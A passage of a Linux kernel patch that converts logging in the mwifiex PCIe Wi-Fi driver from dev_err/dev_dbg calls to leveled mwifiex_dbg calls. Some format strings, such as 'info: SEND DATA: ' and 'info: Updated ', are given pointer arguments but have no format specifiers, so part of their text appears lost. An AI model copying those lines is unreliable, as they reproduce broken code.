interrupt.\n"); + mwifiex_dbg(adapter, ERROR, + "failed to assert dnld-rdy interrupt.\n"); return -1; } } @@ -1018,13 +1032,14 @@ static int mwifiex_pcie_send_data_complete(struct mwifiex_adapter *adapter) /* Read the TX ring read pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->tx_rdptr, &rdptr)) { - dev_err(adapter->dev, - "SEND COMP: failed to read reg->tx_rdptr\n"); + mwifiex_dbg(adapter, ERROR, + "SEND COMP: failed to read reg->tx_rdptr\n"); return -1; } - dev_dbg(adapter->dev, "SEND COMP: rdptr_prev=0x%x, rdptr=0x%x\n", - card->txbd_rdptr, rdptr); + mwifiex_dbg(adapter, DATA, + "SEND COMP: rdptr_prev=0x%x, rdptr=0x%x\n", + card->txbd_rdptr, rdptr); num_tx_buffs = MWIFIEX_MAX_TXRX_BD << reg->tx_start_ptr; /* free from previous txbd_rdptr to current txbd_rdptr */ @@ -1038,9 +1053,9 @@ static int mwifiex_pcie_send_data_complete(struct mwifiex_adapter *adapter) skb = card->tx_buf_list[wrdoneidx]; if (skb) { - dev_dbg(adapter->dev, - "SEND COMP: Detach skb %p at txbd_rdidx=%d\n", - skb, wrdoneidx); + mwifiex_dbg(adapter, DATA, + "SEND COMP: Detach skb %p at txbd_rdidx=%d\n", + skb, wrdoneidx); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); @@ -1112,8 +1127,9 @@ mwifiex_pcie_send_data(struct mwifiex_adapter *adapter, struct sk_buff *skb, __le16 *tmp; if (!(skb->data && skb->len)) { - dev_err(adapter->dev, "%s(): invalid parameter <%p, %#x>\n", - __func__, skb->data, skb->len); + mwifiex_dbg(adapter, ERROR, + "%s(): invalid parameter <%p, %#x>\n", + __func__, skb->data, skb->len); return -1; } @@ -1121,7 +1137,8 @@ mwifiex_pcie_send_data(struct mwifiex_adapter *adapter, struct sk_buff *skb, mwifiex_pm_wakeup_card(adapter); num_tx_buffs = MWIFIEX_MAX_TXRX_BD << reg->tx_start_ptr; - dev_dbg(adapter->dev, "info: SEND DATA: \n", + mwifiex_dbg(adapter, DATA, + "info: SEND DATA: \n", card->txbd_rdptr, card->txbd_wrptr); if (mwifiex_pcie_txbd_not_full(card)) { u8 *payload; @@ -1175,39 +1192,40 @@ mwifiex_pcie_send_data(struct mwifiex_adapter *adapter, struct sk_buff *skb, /* Write the TX ring write pointer in to reg->tx_wrptr */ if (mwifiex_write_reg(adapter, reg->tx_wrptr, card->txbd_wrptr | rx_val)) { - dev_err(adapter->dev, - "SEND DATA: failed to write reg->tx_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "SEND DATA: failed to write reg->tx_wrptr\n"); ret = -1; goto done_unmap; } if ((mwifiex_pcie_txbd_not_full(card)) && tx_param->next_pkt_len) { /* have more packets and TxBD still can hold more */ - dev_dbg(adapter->dev, - "SEND DATA: delay dnld-rdy interrupt.\n"); + mwifiex_dbg(adapter, DATA, + "SEND DATA: delay dnld-rdy interrupt.\n"); adapter->data_sent = false; } else { /* Send the TX ready interrupt */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DNLD_RDY)) { - dev_err(adapter->dev, - "SEND DATA: failed to assert dnld-rdy interrupt.\n"); + mwifiex_dbg(adapter, ERROR, + "SEND DATA: failed to assert dnld-rdy interrupt.\n"); ret = -1; goto done_unmap; } } - dev_dbg(adapter->dev, "info: SEND DATA: Updated and sent packet to firmware successfully\n", - card->txbd_rdptr, card->txbd_wrptr); + mwifiex_dbg(adapter, DATA, + "info: SEND DATA: Updated and sent packet to firmware successfully\n", + card->txbd_rdptr, card->txbd_wrptr); } else { - dev_dbg(adapter->dev, - "info: TX Ring full, can't send packets to fw\n"); + mwifiex_dbg(adapter, DATA, + "info: TX Ring full, can't send packets to fw\n"); adapter->data_sent = true; /* Send the TX ready interrupt */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DNLD_RDY)) - dev_err(adapter->dev, - "SEND DATA: failed to assert door-bell intr\n"); + mwifiex_dbg(adapter, ERROR, + "SEND DATA: failed to assert door-bell intr\n"); return -EBUSY; } @@ -1243,8 +1261,8 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) /* Read the RX ring Write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->rx_wrptr, &wrptr)) { - dev_err(adapter->dev, - "RECV DATA: failed to read reg->rx_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "RECV DATA: failed to read reg->rx_wrptr\n"); ret = -1; goto done; } @@ -1277,15 +1295,15 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) rx_len = le16_to_cpu(pkt_len); if (WARN_ON(rx_len <= INTF_HEADER_LEN || rx_len > MWIFIEX_RX_DATA_BUF_SIZE)) { - dev_err(adapter->dev, - "Invalid RX len %d, Rd=%#x, Wr=%#x\n", - rx_len, card->rxbd_rdptr, wrptr); + mwifiex_dbg(adapter, ERROR, + "Invalid RX len %d, Rd=%#x, Wr=%#x\n", + rx_len, card->rxbd_rdptr, wrptr); dev_kfree_skb_any(skb_data); } else { skb_put(skb_data, rx_len); - dev_dbg(adapter->dev, - "info: RECV DATA: Rd=%#x, Wr=%#x, Len=%d\n", - card->rxbd_rdptr, wrptr, rx_len); + mwifiex_dbg(adapter, DATA, + "info: RECV DATA: Rd=%#x, Wr=%#x, Len=%d\n", + card->rxbd_rdptr, wrptr, rx_len); skb_pull(skb_data, INTF_HEADER_LEN); if (adapter->rx_work_enabled) { skb_queue_tail(&adapter->rx_data_q, skb_data); @@ -1299,8 +1317,8 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) skb_tmp = mwifiex_alloc_dma_align_buf(MWIFIEX_RX_DATA_BUF_SIZE, GFP_KERNEL | GFP_DMA); if (!skb_tmp) { - dev_err(adapter->dev, - "Unable to allocate skb.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb.\n"); return -ENOMEM; } @@ -1311,9 +1329,9 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) buf_pa = MWIFIEX_SKB_DMA_ADDR(skb_tmp); - dev_dbg(adapter->dev, - "RECV DATA: Attach new sk_buff %p at rxbd_rdidx=%d\n", - skb_tmp, rd_index); + mwifiex_dbg(adapter, INFO, + "RECV DATA: Attach new sk_buff %p at rxbd_rdidx=%d\n", + skb_tmp, rd_index); card->rx_buf_list[rd_index] = skb_tmp; if (reg->pfu_enabled) { @@ -1336,28 +1354,29 @@ static int mwifiex_pcie_process_recv_data(struct mwifiex_adapter *adapter) reg->rx_rollover_ind) ^ reg->rx_rollover_ind); } - dev_dbg(adapter->dev, "info: RECV DATA: \n", - card->rxbd_rdptr, wrptr); + mwifiex_dbg(adapter, DATA, + "info: RECV DATA: \n", + card->rxbd_rdptr, wrptr); tx_val = card->txbd_wrptr & reg->tx_wrap_mask; /* Write the RX ring read pointer in to reg->rx_rdptr */ if (mwifiex_write_reg(adapter, reg->rx_rdptr, card->rxbd_rdptr | tx_val)) { - dev_err(adapter->dev, - "RECV DATA: failed to write reg->rx_rdptr\n"); + mwifiex_dbg(adapter, DATA, + "RECV DATA: failed to write reg->rx_rdptr\n"); ret = -1; goto done; } /* Read the RX ring Write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->rx_wrptr, &wrptr)) { - dev_err(adapter->dev, - "RECV DATA: failed to read reg->rx_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "RECV DATA: failed to read reg->rx_wrptr\n"); ret = -1; goto done; } - dev_dbg(adapter->dev, - "info: RECV DATA: Rcvd packet from fw successfully\n"); + mwifiex_dbg(adapter, DATA, + "info: RECV DATA: Rcvd packet from fw successfully\n"); card->rxbd_wrptr = wrptr; } @@ -1376,9 +1395,9 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; if (!(skb->data && skb->len)) { - dev_err(adapter->dev, - "Invalid parameter in %s <%p. len %d>\n", - __func__, skb->data, skb->len); + mwifiex_dbg(adapter, ERROR, + "Invalid parameter in %s <%p. len %d>\n", + __func__, skb->data, skb->len); return -1; } @@ -1391,9 +1410,9 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) * address scratch register */ if (mwifiex_write_reg(adapter, reg->cmd_addr_lo, (u32)buf_pa)) { - dev_err(adapter->dev, - "%s: failed to write download command to boot code.\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to write download command to boot code.\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } @@ -1403,18 +1422,18 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) */ if (mwifiex_write_reg(adapter, reg->cmd_addr_hi, (u32)((u64)buf_pa >> 32))) { - dev_err(adapter->dev, - "%s: failed to write download command to boot code.\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to write download command to boot code.\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } /* Write the command length to cmd_size scratch register */ if (mwifiex_write_reg(adapter, reg->cmd_size, skb->len)) { - dev_err(adapter->dev, - "%s: failed to write command len to cmd_size scratch reg\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to write command len to cmd_size scratch reg\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } @@ -1422,8 +1441,8 @@ mwifiex_pcie_send_boot_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Ring the door bell */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DOOR_BELL)) { - dev_err(adapter->dev, - "%s: failed to assert door-bell intr\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: failed to assert door-bell intr\n", __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); return -1; } @@ -1443,8 +1462,8 @@ static int mwifiex_pcie_init_fw_port(struct mwifiex_adapter *adapter) /* Write the RX ring read pointer in to reg->rx_rdptr */ if (mwifiex_write_reg(adapter, reg->rx_rdptr, card->rxbd_rdptr | tx_wrap)) { - dev_err(adapter->dev, - "RECV DATA: failed to write reg->rx_rdptr\n"); + mwifiex_dbg(adapter, ERROR, + "RECV DATA: failed to write reg->rx_rdptr\n"); return -1; } return 0; @@ -1462,15 +1481,16 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) u8 *payload = (u8 *)skb->data; if (!(skb->data && skb->len)) { - dev_err(adapter->dev, "Invalid parameter in %s <%p, %#x>\n", - __func__, skb->data, skb->len); + mwifiex_dbg(adapter, ERROR, + "Invalid parameter in %s <%p, %#x>\n", + __func__, skb->data, skb->len); return -1; } /* Make sure a command response buffer is available */ if (!card->cmdrsp_buf) { - dev_err(adapter->dev, - "No response buffer available, send command failed\n"); + mwifiex_dbg(adapter, ERROR, + "No response buffer available, send command failed\n"); return -EBUSY; } @@ -1503,8 +1523,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) address */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_lo, (u32)cmdrsp_buf_pa)) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } @@ -1512,8 +1532,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) address */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_hi, (u32)((u64)cmdrsp_buf_pa >> 32))) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } @@ -1523,16 +1543,16 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Write the lower 32bits of the physical address to reg->cmd_addr_lo */ if (mwifiex_write_reg(adapter, reg->cmd_addr_lo, (u32)cmd_buf_pa)) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } /* Write the upper 32bits of the physical address to reg->cmd_addr_hi */ if (mwifiex_write_reg(adapter, reg->cmd_addr_hi, (u32)((u64)cmd_buf_pa >> 32))) { - dev_err(adapter->dev, - "Failed to write download cmd to boot code.\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write download cmd to boot code.\n"); ret = -1; goto done; } @@ -1540,8 +1560,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Write the command length to reg->cmd_size */ if (mwifiex_write_reg(adapter, reg->cmd_size, card->cmd_buf->len)) { - dev_err(adapter->dev, - "Failed to write cmd len to reg->cmd_size\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write cmd len to reg->cmd_size\n"); ret = -1; goto done; } @@ -1549,8 +1569,8 @@ mwifiex_pcie_send_cmd(struct mwifiex_adapter *adapter, struct sk_buff *skb) /* Ring the door bell */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DOOR_BELL)) { - dev_err(adapter->dev, - "Failed to assert door-bell intr\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to assert door-bell intr\n"); ret = -1; goto done; } @@ -1574,7 +1594,8 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) u16 rx_len; __le16 pkt_len; - dev_dbg(adapter->dev, "info: Rx CMD Response\n"); + mwifiex_dbg(adapter, CMD, + "info: Rx CMD Response\n"); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_FROMDEVICE); @@ -1598,8 +1619,8 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_SLEEP_CFM_DONE)) { - dev_warn(adapter->dev, - "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } mwifiex_delay_for_sleep_cookie(adapter, @@ -1608,8 +1629,8 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) mwifiex_pcie_ok_to_access_hw(adapter)) usleep_range(50, 60); } else { - dev_err(adapter->dev, - "There is no command but got cmdrsp\n"); + mwifiex_dbg(adapter, ERROR, + "There is no command but got cmdrsp\n"); } memcpy(adapter->upld_buf, skb->data, min_t(u32, MWIFIEX_SIZE_OF_CMD_BUFFER, skb->len)); @@ -1628,15 +1649,15 @@ static int mwifiex_pcie_process_cmd_complete(struct mwifiex_adapter *adapter) will prevent firmware from writing to the same response buffer again. */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_lo, 0)) { - dev_err(adapter->dev, - "cmd_done: failed to clear cmd_rsp_addr_lo\n"); + mwifiex_dbg(adapter, ERROR, + "cmd_done: failed to clear cmd_rsp_addr_lo\n"); return -1; } /* Write the upper 32bits of the cmdrsp buffer physical address */ if (mwifiex_write_reg(adapter, reg->cmdrsp_addr_hi, 0)) { - dev_err(adapter->dev, - "cmd_done: failed to clear cmd_rsp_addr_hi\n"); + mwifiex_dbg(adapter, ERROR, + "cmd_done: failed to clear cmd_rsp_addr_hi\n"); return -1; } } @@ -1678,25 +1699,28 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) mwifiex_pm_wakeup_card(adapter); if (adapter->event_received) { - dev_dbg(adapter->dev, "info: Event being processed, " - "do not process this interrupt just yet\n"); + mwifiex_dbg(adapter, EVENT, + "info: Event being processed,\t" + "do not process this interrupt just yet\n"); return 0; } if (rdptr >= MWIFIEX_MAX_EVT_BD) { - dev_dbg(adapter->dev, "info: Invalid read pointer...\n"); + mwifiex_dbg(adapter, ERROR, + "info: Invalid read pointer...\n"); return -1; } /* Read the event ring write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->evt_wrptr, &wrptr)) { - dev_err(adapter->dev, - "EventReady: failed to read reg->evt_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "EventReady: failed to read reg->evt_wrptr\n"); return -1; } - dev_dbg(adapter->dev, "info: EventReady: Initial ", - card->evtbd_rdptr, wrptr); + mwifiex_dbg(adapter, EVENT, + "info: EventReady: Initial ", + card->evtbd_rdptr, wrptr); if (((wrptr & MWIFIEX_EVTBD_MASK) != (card->evtbd_rdptr & MWIFIEX_EVTBD_MASK)) || ((wrptr & reg->evt_rollover_ind) == @@ -1705,7 +1729,8 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) __le16 data_len = 0; u16 evt_len; - dev_dbg(adapter->dev, "info: Read Index: %d\n", rdptr); + mwifiex_dbg(adapter, INFO, + "info: Read Index: %d\n", rdptr); skb_cmd = card->evt_buf_list[rdptr]; mwifiex_unmap_pci_memory(adapter, skb_cmd, PCI_DMA_FROMDEVICE); @@ -1723,7 +1748,8 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) evt_len = le16_to_cpu(data_len); skb_trim(skb_cmd, evt_len); skb_pull(skb_cmd, INTF_HEADER_LEN); - dev_dbg(adapter->dev, "info: Event length: %d\n", evt_len); + mwifiex_dbg(adapter, EVENT, + "info: Event length: %d\n", evt_len); if ((evt_len > 0) && (evt_len < MAX_EVENT_SIZE)) memcpy(adapter->event_body, skb_cmd->data + @@ -1740,8 +1766,8 @@ static int mwifiex_pcie_process_event_ready(struct mwifiex_adapter *adapter) } else { if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_EVENT_DONE)) { - dev_warn(adapter->dev, - "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } } @@ -1766,15 +1792,16 @@ static int mwifiex_pcie_event_complete(struct mwifiex_adapter *adapter, return 0; if (rdptr >= MWIFIEX_MAX_EVT_BD) { - dev_err(adapter->dev, "event_complete: Invalid rdptr 0x%x\n", - rdptr); + mwifiex_dbg(adapter, ERROR, + "event_complete: Invalid rdptr 0x%x\n", + rdptr); return -EINVAL; } /* Read the event ring write pointer set by firmware */ if (mwifiex_read_reg(adapter, reg->evt_wrptr, &wrptr)) { - dev_err(adapter->dev, - "event_complete: failed to read reg->evt_wrptr\n"); + mwifiex_dbg(adapter, ERROR, + "event_complete: failed to read reg->evt_wrptr\n"); return -1; } @@ -1791,9 +1818,9 @@ static int mwifiex_pcie_event_complete(struct mwifiex_adapter *adapter, desc->flags = 0; skb = NULL; } else { - dev_dbg(adapter->dev, - "info: ERROR: buf still valid at index %d, <%p, %p>\n", - rdptr, card->evt_buf_list[rdptr], skb); + mwifiex_dbg(adapter, ERROR, + "info: ERROR: buf still valid at index %d, <%p, %p>\n", + rdptr, card->evt_buf_list[rdptr], skb); } if ((++card->evtbd_rdptr & MWIFIEX_EVTBD_MASK) == MWIFIEX_MAX_EVT_BD) { @@ -1802,18 +1829,20 @@ static int mwifiex_pcie_event_complete(struct mwifiex_adapter *adapter, reg->evt_rollover_ind); } - dev_dbg(adapter->dev, "info: Updated ", - card->evtbd_rdptr, wrptr); + mwifiex_dbg(adapter, EVENT, + "info: Updated ", + card->evtbd_rdptr, wrptr); /* Write the event ring read pointer in to reg->evt_rdptr */ if (mwifiex_write_reg(adapter, reg->evt_rdptr, card->evtbd_rdptr)) { - dev_err(adapter->dev, - "event_complete: failed to read reg->evt_rdptr\n"); + mwifiex_dbg(adapter, ERROR, + "event_complete: failed to read reg->evt_rdptr\n"); return -1; } - dev_dbg(adapter->dev, "info: Check Events Again\n"); + mwifiex_dbg(adapter, EVENT, + "info: Check Events Again\n"); ret = mwifiex_pcie_process_event_ready(adapter); return ret; @@ -1840,17 +1869,18 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; if (!firmware || !firmware_len) { - dev_err(adapter->dev, - "No firmware image found! Terminating download\n"); + mwifiex_dbg(adapter, ERROR, + "No firmware image found! Terminating download\n"); return -1; } - dev_dbg(adapter->dev, "info: Downloading FW image (%d bytes)\n", - firmware_len); + mwifiex_dbg(adapter, INFO, + "info: Downloading FW image (%d bytes)\n", + firmware_len); if (mwifiex_pcie_disable_host_int(adapter)) { - dev_err(adapter->dev, - "%s: Disabling interrupts failed.\n", __func__); + mwifiex_dbg(adapter, ERROR, + "%s: Disabling interrupts failed.\n", __func__); return -1; } @@ -1872,8 +1902,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, ret = mwifiex_read_reg(adapter, reg->cmd_size, &len); if (ret) { - dev_warn(adapter->dev, - "Failed reading len from boot code\n"); + mwifiex_dbg(adapter, FATAL, + "Failed reading len from boot code\n"); goto done; } if (len) @@ -1884,8 +1914,9 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (!len) { break; } else if (len > MWIFIEX_UPLD_SIZE) { - pr_err("FW download failure @ %d, invalid length %d\n", - offset, len); + mwifiex_dbg(adapter, ERROR, + "FW download failure @ %d, invalid length %d\n", + offset, len); ret = -1; goto done; } @@ -1895,14 +1926,16 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (len & BIT(0)) { block_retry_cnt++; if (block_retry_cnt > MAX_WRITE_IOMEM_RETRY) { - pr_err("FW download failure @ %d, over max " - "retry count\n", offset); + mwifiex_dbg(adapter, ERROR, + "FW download failure @ %d, over max\t" + "retry count\n", offset); ret = -1; goto done; } - dev_err(adapter->dev, "FW CRC error indicated by the " - "helper: len = 0x%04X, txlen = %d\n", - len, txlen); + mwifiex_dbg(adapter, ERROR, + "FW CRC error indicated by the\t" + "helper: len = 0x%04X, txlen = %d\n", + len, txlen); len &= ~BIT(0); /* Setting this to 0 to resend from same offset */ txlen = 0; @@ -1913,7 +1946,7 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, if (firmware_len - offset < txlen) txlen = firmware_len - offset; - dev_dbg(adapter->dev, "."); + mwifiex_dbg(adapter, INFO, "."); tx_blocks = (txlen + card->pcie.blksz_fw_dl - 1) / card->pcie.blksz_fw_dl; @@ -1927,8 +1960,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, /* Send the boot command to device */ if (mwifiex_pcie_send_boot_cmd(adapter, skb)) { - dev_err(adapter->dev, - "Failed to send firmware download command\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to send firmware download command\n"); ret = -1; goto done; } @@ -1937,9 +1970,10 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, do { if (mwifiex_read_reg(adapter, PCIE_CPU_INT_STATUS, &ireg_intr)) { - dev_err(adapter->dev, "%s: Failed to read " - "interrupt status during fw dnld.\n", - __func__); + mwifiex_dbg(adapter, ERROR, + "%s: Failed to read\t" + "interrupt status during fw dnld.\n", + __func__); mwifiex_unmap_pci_memory(adapter, skb, PCI_DMA_TODEVICE); ret = -1; @@ -1953,8 +1987,8 @@ static int mwifiex_prog_fw_w_helper(struct mwifiex_adapter *adapter, offset += txlen; } while (true); - dev_notice(adapter->dev, - "info: FW download over, size %d bytes\n", offset); + mwifiex_dbg(adapter, MSG, + "info: FW download over, size %d bytes\n", offset); ret = 0; @@ -1980,15 +2014,17 @@ mwifiex_check_fw_status(struct mwifiex_adapter *adapter, u32 poll_num) /* Mask spurios interrupts */ if (mwifiex_write_reg(adapter, PCIE_HOST_INT_STATUS_MASK, HOST_INTR_MASK)) { - dev_warn(adapter->dev, "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } - dev_dbg(adapter->dev, "Setting driver ready signature\n"); + mwifiex_dbg(adapter, INFO, + "Setting driver ready signature\n"); if (mwifiex_write_reg(adapter, reg->drv_rdy, FIRMWARE_READY_PCIE)) { - dev_err(adapter->dev, - "Failed to write driver ready signature\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to write driver ready signature\n"); return -1; } @@ -2015,12 +2051,13 @@ mwifiex_check_fw_status(struct mwifiex_adapter *adapter, u32 poll_num) &winner_status)) ret = -1; else if (!winner_status) { - dev_err(adapter->dev, "PCI-E is the winner\n"); + mwifiex_dbg(adapter, INFO, + "PCI-E is the winner\n"); adapter->winner = 1; } else { - dev_err(adapter->dev, - "PCI-E is not the winner <%#x,%d>, exit dnld\n", - ret, adapter->winner); + mwifiex_dbg(adapter, ERROR, + "PCI-E is not the winner <%#x,%d>, exit dnld\n", + ret, adapter->winner); } } @@ -2039,7 +2076,7 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) return; if (mwifiex_read_reg(adapter, PCIE_HOST_INT_STATUS, &pcie_ireg)) { - dev_warn(adapter->dev, "Read register failed\n"); + mwifiex_dbg(adapter, ERROR, "Read register failed\n"); return; } @@ -2050,7 +2087,8 @@ static void mwifiex_interrupt_status(struct mwifiex_adapter *adapter) /* Clear the pending interrupts */ if (mwifiex_write_reg(adapter, PCIE_HOST_INT_STATUS, ~pcie_ireg)) { - dev_warn(adapter->dev, "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return; } spin_lock_irqsave(&adapter->int_lock, flags); @@ -2133,21 +2171,24 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) while (pcie_ireg & HOST_INTR_MASK) { if (pcie_ireg & HOST_INTR_DNLD_DONE) { pcie_ireg &= ~HOST_INTR_DNLD_DONE; - dev_dbg(adapter->dev, "info: TX DNLD Done\n"); + mwifiex_dbg(adapter, INTR, + "info: TX DNLD Done\n"); ret = mwifiex_pcie_send_data_complete(adapter); if (ret) return ret; } if (pcie_ireg & HOST_INTR_UPLD_RDY) { pcie_ireg &= ~HOST_INTR_UPLD_RDY; - dev_dbg(adapter->dev, "info: Rx DATA\n"); + mwifiex_dbg(adapter, INTR, + "info: Rx DATA\n"); ret = mwifiex_pcie_process_recv_data(adapter); if (ret) return ret; } if (pcie_ireg & HOST_INTR_EVENT_RDY) { pcie_ireg &= ~HOST_INTR_EVENT_RDY; - dev_dbg(adapter->dev, "info: Rx EVENT\n"); + mwifiex_dbg(adapter, INTR, + "info: Rx EVENT\n"); ret = mwifiex_pcie_process_event_ready(adapter); if (ret) return ret; @@ -2156,8 +2197,8 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (pcie_ireg & HOST_INTR_CMD_DONE) { pcie_ireg &= ~HOST_INTR_CMD_DONE; if (adapter->cmd_sent) { - dev_dbg(adapter->dev, - "info: CMD sent Interrupt\n"); + mwifiex_dbg(adapter, INTR, + "info: CMD sent Interrupt\n"); adapter->cmd_sent = false; } /* Handle command response */ @@ -2169,8 +2210,8 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (mwifiex_pcie_ok_to_access_hw(adapter)) { if (mwifiex_read_reg(adapter, PCIE_HOST_INT_STATUS, &pcie_ireg)) { - dev_warn(adapter->dev, - "Read register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Read register failed\n"); return -1; } @@ -2178,16 +2219,17 @@ static int mwifiex_process_int_status(struct mwifiex_adapter *adapter) if (mwifiex_write_reg(adapter, PCIE_HOST_INT_STATUS, ~pcie_ireg)) { - dev_warn(adapter->dev, - "Write register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Write register failed\n"); return -1; } } } } - dev_dbg(adapter->dev, "info: cmd_sent=%d data_sent=%d\n", - adapter->cmd_sent, adapter->data_sent); + mwifiex_dbg(adapter, INTR, + "info: cmd_sent=%d data_sent=%d\n", + adapter->cmd_sent, adapter->data_sent); if (adapter->ps_state != PS_STATE_SLEEP) mwifiex_pcie_enable_host_int(adapter); @@ -2209,7 +2251,8 @@ static int mwifiex_pcie_host_to_card(struct mwifiex_adapter *adapter, u8 type, struct mwifiex_tx_param *tx_param) { if (!skb) { - dev_err(adapter->dev, "Passed NULL skb to %s\n", __func__); + mwifiex_dbg(adapter, ERROR, + "Passed NULL skb to %s\n", __func__); return -1; } @@ -2232,7 +2275,8 @@ mwifiex_pcie_rdwr_firmware(struct mwifiex_adapter *adapter, u8 doneflag) ret = mwifiex_write_reg(adapter, reg->fw_dump_ctrl, FW_DUMP_HOST_READY); if (ret) { - dev_err(adapter->dev, "PCIE write err\n"); + mwifiex_dbg(adapter, ERROR, + "PCIE write err\n"); return RDWR_STATUS_FAILURE; } @@ -2243,19 +2287,20 @@ mwifiex_pcie_rdwr_firmware(struct mwifiex_adapter *adapter, u8 doneflag) if (doneflag && ctrl_data == doneflag) return RDWR_STATUS_DONE; if (ctrl_data != FW_DUMP_HOST_READY) { - dev_info(adapter->dev, - "The ctrl reg was changed, re-try again!\n"); + mwifiex_dbg(adapter, WARN, + "The ctrl reg was changed, re-try again!\n"); ret = mwifiex_write_reg(adapter, reg->fw_dump_ctrl, FW_DUMP_HOST_READY); if (ret) { - dev_err(adapter->dev, "PCIE write err\n"); + mwifiex_dbg(adapter, ERROR, + "PCIE write err\n"); return RDWR_STATUS_FAILURE; } } usleep_range(100, 200); } - dev_err(adapter->dev, "Fail to pull ctrl_data\n"); + mwifiex_dbg(adapter, ERROR, "Fail to pull ctrl_data\n"); return RDWR_STATUS_FAILURE; } @@ -2284,7 +2329,7 @@ static void mwifiex_pcie_fw_dump_work(struct mwifiex_adapter *adapter) entry->mem_size = 0; } - dev_info(adapter->dev, "== mwifiex firmware dump start ==\n"); + mwifiex_dbg(adapter, DUMP, "== mwifiex firmware dump start ==\n"); /* Read the number of the memories which will dump */ stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); @@ -2311,31 +2356,31 @@ static void 